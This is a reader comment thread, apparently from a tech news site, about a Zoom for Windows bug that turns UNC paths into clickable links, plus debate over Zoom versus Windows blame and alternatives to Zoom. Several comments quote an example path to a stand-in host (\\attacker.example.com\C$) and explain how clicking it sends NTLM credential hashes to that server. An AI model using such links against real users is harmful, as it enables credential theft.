Unpatched Zoom bug lets attackers steal Windows credentials with no warning

Zoom for Windows converts network locations into clickable links. What could go wrong?

Read the whole story

 

[SmokeTest]

The events of the past month have left millions of people working from home without the same levels of IT and security support they get when working on premises. That makes it more likely that port 445 is open, either because of an oversight or because the port is needed to connect to enterprise resources.

...or because you're using SMB to make your 40TB media collection available on your local network.

 

[Got Nate?]

Sorry, I understand the problem, but I don't understand the fix. Is Zoom sending credentials when it doesn't have to? Or is Windows Explorer sending credentials whenever you click one of these links?

It's Zoom that tells Windows to open the link. Windows sends the credentials to log in.

Zoom should not be linking these in the first place. That would be the easiest and fasted fix. Maybe someone can explain because I'm uncertain why Zoom even allows linking Windows paths?

But maybe Windows should always ask before connecting to a new (unknown) server. Mind you it can be hard to stop people automatically clicking "allow".

Ultimately the fix is that NTLM is completely removed. Microsoft strongly recommends against its use but it's needed for compatibility with older services.

What I don't understand is why Windows would send the credentials to Zoom, rather than just open the path in Explorer. This sounds like a Windows problem more than a Zoom problem.

No, this is definitely on Zoom. When an application tells Windows that a user wants to open a given link, it has to open. The problem is that Zoom is creating links based on data from untrustworthy sources. Compare that to what happens if your email client gets a suspect mail and disables links in the message so that users cannot accidentally click on them.

Ok, I'll make that comparison. I still blame windows. Just like Zoom, it shouldn't be up to the email software to protect the user from their own OS.*

The reason everyone is attacking zoom over this now is because they now have an established history of poor security decisions. It's just more piling on. Also, fuck zoom.

*E: To continue the thought: It should be the OS protecting the user from malicious links, not leaking credentials in the first place. NTLM has been deprecated for 2 decades. There is no reason for it to be enabled by default in this day and age.

 

[jhodge]

This is evidently a Microsoft Windows flaw.

It appears to be reported along the same lines as: the Tech Industry built insecure products, so let's train users to not click links.

Fix Windows so it doesn't send credentials to random SMB servers on the internet that bear no relation to the host's domain, and using an insecure protocol to boot.

Sheesh!

It's also a Zoom flaw. There is very little upside to turning UNC paths in to clickable links, and this risk is both clear and well-known. This is yet another risk/reward trade-off that Zoom has made in favor of 'more risk'.

 

[karoc]

PS. Would love to hear of a viable alternative.

Work has Skype for Business. It doesn't work because the VPN is being hammered at the moment and it was constantly dropping out. This has put people off using free Skype.

Hangouts has had endless problems for us in the past so, again, people are reluctant to use it now. Plus, Google. So, meh.

FaceTime isn't cross-platform so the handful of non-Mac users can't be included.

So, other than Zoom, what's cross-platform and cross device (desktop/tablet/phone) that works?

Teams? Am I missing something?

 

[Danathar]

Zoom is the whipping boy because they became top dog quickly. Most of these bugs are zoom prioritizing usability (which is why they are on top) over thorough security. Their security isn't terrible, but isn't great either.

Honestly, this should be good for them, they get to be inspected by a microscope and if they take measures to address what people bring up it will be a good thing for them.

Beware of clickbait "ZOMG!! ZOOM IS STEALING ALL YOUR DATA" stories though. Pays to dig and find out exactly what the issues are and what you can do (if anything) to mitigate them.

 

[Oak]

universal naming convention strings—such as //attacker.example.com/C$

Why forward slashes and the (hidden-administrative-share-indicating) dollar sign in the example? UNC paths standardly use backslashes, and the malicious link thing here doesn't generally require a dollar sign.

Does Zoom on Windows allow links to be interpreted as UNC paths even with forward slashes?

 

[xeoph]

I've used zoom when needing enterprise support on a firewall for a couple years now. We liked it so much we started using it for support as well.

Compared to other products it has similar features, costs less and works more reliably.

Zoom has gotten a lot of attention and a lot more testing here recently so it would only be expected that we find all of these problems. Ultimately it's a good thing as long as they actively participate in resolving the issues.

EVERY other meeting/remote support software has had many exploits over time. So often it's a quick headline, we update software and it's done. Gotomeeting, Webex and I'm sure it's actual every other option have all had remote control exploits via browser plugins and other various goofs. I think it's great that we fix Zoom as a group but not so great that we act like this is a one company problem. IT Security is too lax everywhere, not just in one product!

 

[Isitari]

Oh great and combined with this: https://www.theregister.co.uk/AMP/2020/ ... spotlight/ this can only end well...

 

[arsgiles]

I've used zoom when needing enterprise support on a firewall for a couple years now. We liked it so much we started using it for support as well.

Compared to other products it has similar features, costs less and works more reliably.

Zoom has gotten a lot of attention and a lot more testing here recently so it would only be expected that we find all of these problems. Ultimately it's a good thing as long as they actively participate in resolving the issues.

EVERY other meeting/remote support software has had many exploits over time. So often it's a quick headline, we update software and it's done. Gotomeeting, Webex and I'm sure it's actual every other option have all had remote control exploits via browser plugins and other various goofs. I think it's great that we fix Zoom as a group but not so great that we act like this is a one company problem. IT Security is too lax everywhere, not just in one product!

I agree. We are a high tech company with lots of smart people and we have used just about every conferencing tool out there. Zoom (or skins of Zoom like RingCentral) "just works" with our guys and more importantly with our suppliers and customers. And our IT department hasn't had heartburn about the exploits (due to the nature of our business they are all over this).

 

[NinjaNerd56]

So, we are using Group FaceTime as option 1 for family.

Tested Zoom...uh, no. 84 y/o MIL and other older relatives just hated it. Security even bigger concern for them; they’ll click all the random shit they see.

Option 3, WebEx. Yes, it’s a work asset, so last choice, but if we’re in for 3-4 MONTHS, that may be what we can use.

As for work, it’s been 98% WebEx, 1.99% Skype, and one horror movie called TEAMS!

YMMV, WAC, WSL.

 

[Lacedaemon]

I’ve had zoom forced on me in the last couple of months, along with 5 other teleconference platforms.

Zoom is the only one that has caused problems.

I've had the opposite. Out of Skype, Hangouts, and Zoom, Zoom has had the least issues (video, audio, freezing, etc...).

That's interesting - I haven't used Skype or Hangouts.

I've used MS Teams, Cisco WebEx, Signal, and HireVue for video conferencing. Some parts of my company use Slack as well. I haven't happened to need it recently, but was nice the last time I did. Zoom has worked OK, but has been a security nightmare. In terms of raw functionality in my experience, it's probably not as good as Teams or WebEx and better than the others.

HireVue probably had the lowest performance. Signal doesn't offer enterprise videoconference features like screen sharing since that's not its target market. WebEx and Teams seem to be the most robust of the lot. This crisis is the first time I've used Teams, and I have to say, I'm really impressed with it.

 

[Chemical Tribe]

I’ve had zoom forced on me in the last couple of months, along with 5 other teleconference platforms.

Zoom is the only one that has caused problems.

I've had the opposite. Out of Skype, Hangouts, and Zoom, Zoom has had the least issues (video, audio, freezing, etc...).

That's interesting - I haven't used Skype or Hangouts.

I've used MS Teams, Cisco WebEx, Signal, and HireVue for video conferencing. Some parts of my company use Slack as well. I haven't happened to need it recently, but was nice the last time I did. Zoom has worked OK, but has been a security nightmare. In terms of raw functionality in my experience, it's probably not as good as Teams or WebEx and better than the others.

HireVue probably had the lowest performance. Signal doesn't offer enterprise videoconference features like screen sharing since that's not its target market. WebEx and Teams seem to be the most robust of the lot. This crisis is the first time I've used Teams, and I have to say, I'm really impressed with it.

My only experience is signal is pretty poor, compared to Skype, WhatsApp or duo. But it works. They need to let you be able to move video windows better.

 

[ChrisSD]

universal naming convention strings—such as //attacker.example.com/C$

Why forward slashes and the (hidden-administrative-share-indicating) dollar sign in the example? UNC paths standardly use backslashes, and the malicious link thing here doesn't generally require a dollar sign.

Does Zoom on Windows allow links to be interpreted as UNC paths even with forward slashes?

The Windows API converts forwards slashes to backslashes by default. It doesn't really matter what the share name is.

 

[Gilgamesh]

Zoom is a pain to use.

Have you ever tried WebEx? Zoom is rainbows and unicorns compared to that shitshow.

 

[ZippyPeanut]

Zoom is a pain to use.

Have you ever tried WebEx? Zoom is rainbows and unicorns compared to that shitshow.

Yeah, My grandmother can use Zoom, and she's dead.

 

[bagok]

Cisco has been working on enterprise collaboration software for years, all the while letting WebEx rot as "old tech". And now their milkshake gets taken by a new meetings space phenom. No wonder their stock was tanking before the market took a plunge.

Full disclosure: Some miniscule part of the failure is mine as I worked on these products. I was invited to leave for productivity reasons. Perhaps the invitations didn't reach high enough into management as they should have.

 

[GlockenspielHero]

And April's off to a great start.

I don't see how Zoom got so much good faith in the past few weeks after their last little security shitstorm with the hidden web server.

Because it actually works. I managed to get 300+ faculty who had never done any form of distance ed online in a week. We built a special helpdesk to handle the flood of calls from our 2700 students that we were going to get Monday morning when they returned to virtual classes and got all of 20 calls, all of them related to hardware or rural internet failures.

We've tried a pile of others from WebEx to Realtimeboard on a few hybrid courses we run in the summer and all have fallen over under far smaller loads or been much harder to use.

Yes, we're going to have to go back with our faculty and start hardening some stuff that shouldn't have been left open, but leaving it open actually made it work and right now that's what we needed.

 

[dangoodin]

universal naming convention strings—such as //attacker.example.com/C$

Why forward slashes and the (hidden-administrative-share-indicating) dollar sign in the example? UNC paths standardly use backslashes, and the malicious link thing here doesn't generally require a dollar sign.

Does Zoom on Windows allow links to be interpreted as UNC paths even with forward slashes?

Apologies. That was a typo on my part. I have updated to change it to \\attacker.example.com/C$

 

[BryceS]

At the time we chose zoom it was primarily because it was the only one of the contenders that didn't require attendees at meetings to have to create an account with the platform provider first before they could use. That was a big plus for us.

 

[ChrisSD]

universal naming convention strings—such as //attacker.example.com/C$

Why forward slashes and the (hidden-administrative-share-indicating) dollar sign in the example? UNC paths standardly use backslashes, and the malicious link thing here doesn't generally require a dollar sign.

Does Zoom on Windows allow links to be interpreted as UNC paths even with forward slashes?

Apologies. That was a typo on my part. I have updated to change it to \\attacker.example.com/C$

In that case you'll also want to change the `/C$` to `\C$` for the sake of consistency.

 

[dermott]

What I don't understand is why Windows would send the credentials to Zoom, rather than just open the path in Explorer. This sounds like a Windows problem more than a Zoom problem.

It doesn't send the credentials to Zoom. What happens is:

1. Zoom asks Windows to open the link "\\attacker.example.com\C$".

2. Windows dutifully connects to "attacker.example.com" and attempts to login.

And for the folks wondering why they might linkify those, well... because it's useful. Otherwise, people need to copy the link and paste it into Run or Explorer directly. Outlook lets you do the same thing.

Yeah, NTLM authentication isn't ideal, but that's not really the fault of the folks that made the filepath clickable.
For better or worse, in Windows, today, it's up to the user to not make an SMB connection to an untrusted server. When you connect to an SMB server, the server's going to get a hashed copy of your creds.

If you don't want to send outgoing NTLM auths, there's a security policy for that: Network Security: Restrict NTLM: Outgoing NTLM traffic to remote servers (Computer Configuration\Windows Settings\Security Settings\Local Policies\Security Options)

The policy allows you to block all outgoing NTLM auth attempts, or to provide a list of allowed servers.

 

[TheArsTrev]

And April's off to a great start.

I don't see how Zoom got so much good faith in the past few weeks after their last little security shitstorm with the hidden web server.

In my circles, its all the non-techie mom's and pops that are downloading and using this crap...they didn't understand why i was refusing to join in. le sigh.

 

[TheArsTrev]

PS. Would love to hear of a viable alternative.

Work has Skype for Business. It doesn't work because the VPN is being hammered at the moment and it was constantly dropping out. This has put people off using free Skype.

Hangouts has had endless problems for us in the past so, again, people are reluctant to use it now. Plus, Google. So, meh.

FaceTime isn't cross-platform so the handful of non-Mac users can't be included.

So, other than Zoom, what's cross-platform and cross device (desktop/tablet/phone) that works?

Teams? Am I missing something?

8 or less people? Duo.

 

[fuzzyfuzzyfungus]

Zoom may not actually be malicious, but they clearly place security and privacy way, way behind making the experience quick & easy for user.

That's pretty much why IT hates BYOD and 'shadow IT' in a nutshell.

It's not (just*) because we hate all users want want everything locked down and beige; it's because it is substantially easier to deliver a pleasant, easy to use, fast to roll out, product if you ignore a variety of important but minimally visible and very unsexy things(it's also more likely if you are lean and hungry, rather than primarily rolling out new features based on how well they mesh with your existing product line; admittedly); which makes it virtually certain that, if you pick solutions by individual enthusiasm, you will end up with some ugly gaps to deal with.

Especially if you have regulatory or contractual requirements to, say, keep some data from bleeding out all over the place, or enforce retention policies(either in the 'backup' or the 'destroy after X date' sense).

It's also loads of fun if multiple products are selected by ad-hoc popular adoption without anyone to be the "but how does it SSO with our system of choice?" guy". Then you get to also play pick-the-password-manager to paper over that problem. Fun times!

 

[Dr. Midnight]

Per InfoSec Twitter, this was reproduced on macOS: https://twitter.com/SymbianSyMoh/status ... 3932922881

 

[ChrisSD]

Per InfoSec Twitter, this was reproduced on macOS: https://twitter.com/SymbianSyMoh/status ... 3932922881

The "more user interactions" could do with some explanation. Does that mean it prompts the user before connecting? What does that look like?

 

[necrosis]

ISP's allow windows file sharing again? I thought this was blocked by nearly every one.

I guess 'nearly' is the issue.

 

[necrosis]

What I don't understand is why Windows would send the credentials to Zoom, rather than just open the path in Explorer. This sounds like a Windows problem more than a Zoom problem.

It doesn't send the credentials to Zoom. What happens is:

1. Zoom asks Windows to open the link "\\attacker.example.com\C$".

2. Windows dutifully connects to "attacker.example.com" and attempts to login.

And for the folks wondering why they might linkify those, well... because it's useful. Otherwise, people need to copy the link and paste it into Run or Explorer directly. Outlook lets you do the same thing.

Yeah, NTLM authentication isn't ideal, but that's not really the fault of the folks that made the filepath clickable.
For better or worse, in Windows, today, it's up to the user to not make an SMB connection to an untrusted server. When you connect to an SMB server, the server's going to get a hashed copy of your creds.

If you don't want to send outgoing NTLM auths, there's a security policy for that: Network Security: Restrict NTLM: Outgoing NTLM traffic to remote servers (Computer Configuration\Windows Settings\Security Settings\Local Policies\Security Options)

The policy allows you to block all outgoing NTLM auth attempts, or to provide a list of allowed servers.

What exactly happens when this is enabled? Does it just not auto send the current logged in users creds and popup a box to enter them?

 

[Taijian]

PS. Would love to hear of a viable alternative.

Work has Skype for Business. It doesn't work because the VPN is being hammered at the moment and it was constantly dropping out. This has put people off using free Skype.

Hangouts has had endless problems for us in the past so, again, people are reluctant to use it now. Plus, Google. So, meh.

FaceTime isn't cross-platform so the handful of non-Mac users can't be included.

So, other than Zoom, what's cross-platform and cross device (desktop/tablet/phone) that works?

I'm just gonna throw Jitsi out there. It's FOSS, anyone can either set up their own server/service or just use one of the freely accessible ones out there. No registration required, can run in any (semi-modern) browser, Android/iOS-Apps exist...
Does, of course, require your in-House IT to be semi-literate, in case you want to roll with your own server.

 

[SeanJW]

This is evidently a Microsoft Windows flaw.

It appears to be reported along the same lines as: the Tech Industry built insecure products, so let's train users to not click links.

Fix Windows so it doesn't send credentials to random SMB servers on the internet that bear no relation to the host's domain, and using an insecure protocol to boot.

Sheesh!

It's also a Zoom flaw. There is very little upside to turning UNC paths in to clickable links, and this risk is both clear and well-known. This is yet another risk/reward trade-off that Zoom has made in favor of 'more risk'.

It's an enterprise product being used all over the place - UNC links in an enterprise do have value.

 

[JamesHulsmann]

You don't need Zoom or anything like it for K-12.

My brother here in NY teaches in HS, and the students must access/download a lesson and other resources and do the work and submit back some material. If students need more, there is this thing called a phone.

According to my brother, things are going fine, and other teachers in the family at other districts and differing grade-levels are doing the same.

Yes, it is different and the teachers had to come up with thing that would not require your typical lecture, but it is working and no one has opened themselves up to lesser security than the online-resources that already existed.


Really, I guess if your school had nothing online these video conference classes could be a nice, temporary fallback, but if the lion's share of teachers doing virtual classrooms with 20+ video feeds using some untested but "easy to use" software is lazy, dangerous and shortsighted. Of course, you could also just email stuff to parents and handle things that way.

 

[Caius Marius]

I’ve had zoom forced on me in the last couple of months, along with 5 other teleconference platforms.

Zoom is the only one that has caused problems.

I've had the opposite. Out of Skype, Hangouts, and Zoom, Zoom has had the least issues (video, audio, freezing, etc...).

That's interesting - I haven't used Skype or Hangouts.

I've used MS Teams, Cisco WebEx, Signal, and HireVue for video conferencing. Some parts of my company use Slack as well. I haven't happened to need it recently, but was nice the last time I did. Zoom has worked OK, but has been a security nightmare. In terms of raw functionality in my experience, it's probably not as good as Teams or WebEx and better than the others.

HireVue probably had the lowest performance. Signal doesn't offer enterprise videoconference features like screen sharing since that's not its target market. WebEx and Teams seem to be the most robust of the lot. This crisis is the first time I've used Teams, and I have to say, I'm really impressed with it.

How's that everyone's experience differs so wildly with these products? One man's junk is another man's treasure, I suppose.

 

[phoenix_rizzen]

You don't need Zoom or anything like it for K-12.

My brother here in NY teaches in HS, and the students must access/download a lesson and other resources and do the work and submit back some material. If students need more, there is this thing called a phone.

According to my brother, things are going fine, and other teachers in the family at other districts and differing grade-levels are doing the same.

Yes, it is different and the teachers had to come up with thing that would not require your typical lecture, but it is working and no one has opened themselves up to lesser security than the online-resources that already existed.


Really, I guess if your school had nothing online these video conference classes could be a nice, temporary fallback, but if the lion's share of teachers doing virtual classrooms with 20+ video feeds using some untested but "easy to use" software is lazy, dangerous and shortsighted. Of course, you could also just email stuff to parents and handle things that way.

There's something to be said for actually seeing people's faces and interacting with them live. Especially for the earlier grades (elementary school). Not so much for actually teaching a course, but to keep up the interactions between the student and the teacher, and between students themselves.

Especially when you're stuck at home without any face-to-face interactions with those outside your immediate family.

Online courses aren't new (we have a whole virtual school devoted to just that). But students always had the opportunity to stop by a physical location and interact with the staff and students; or to go hang out with friends, or at the mall, or what not. That's not possible right now, so some kind of videoconferencing is needed to fill the gap.

At least in our district, Zoom isn't used for 1-to-many lectures, but more for 1-on-1 tutoring, weekly check-ins with students, and for keeping contact with staff and students. We use Moodle and Freshgrade for the actual online coursework.

 

[xerces8]

Windows still uses NTLM? The "pass the hash" variant?

 

[Twilight Sparkle]

Port 445 is closed by default in Windows Firewall. Does installing Zoom open it?

 

[fknuckles]

This is evidently a Microsoft Windows flaw.

It appears to be reported along the same lines as: the Tech Industry built insecure products, so let's train users to not click links.

Fix Windows so it doesn't send credentials to random SMB servers on the internet that bear no relation to the host's domain, and using an insecure protocol to boot.

Sheesh!

It's also a Zoom flaw. There is very little upside to turning UNC paths in to clickable links, and this risk is both clear and well-known. This is yet another risk/reward trade-off that Zoom has made in favor of 'more risk'.

I don't know how you can say that with a straight face.

Operating system leaks passwords. Zoom isn't putting users at risk doing a sensible thing, no matter how little upside it has for you. The beeping operating system is handling the situation in a callous and irresponsible manner.

 

[Axiomatic13]

What I read. "Never use Zoom." Got it. Done.

 

[fknuckles]

Port 445 is closed by default in Windows Firewall. Does installing Zoom open it?

Port is closed for inbound connections. It isn't closed for outbound, otherwise users won't be able to access Windows shares.

 

[glugglug]

Something doesn't make sense here. IF this works, the hole is in Windows.

If I click a link to \\attacker.example.com\c$ the expectation is Windows will see attacker.example.com != my local machine, and prompt me to supply a username and password to log into it (assuming guest credentials fail).

Now many, many users will get confused and supply their username and password at the login prompt.. But that is not the same as it being sent as soon as you click the link. If it IS doing that, that is a pretty big hole in windows. I can make links to file:\attacker.example.com\c$ that will do the same on a web page.

 

[Ozy]

Something doesn't make sense here. IF this works, the hole is in Windows.

If I click a link to \\attacker.example.com\c$ the expectation is Windows will see attacker.example.com != my local machine, and prompt me to supply a username and password to log into it (assuming guest credentials fail).

Now many, many users will get confused and supply their username and password at the login prompt.. But that is not the same as it being sent as soon as you click the link. If it IS doing that, that is a pretty big hole in windows. I can make links to file:\attacker.example.com\c$ that will do the same on a web page.

Pretty sure Windows tries to use your login credentials first to access a share, otherwise there's a whole lot of inconvenience to access anything on your LAN.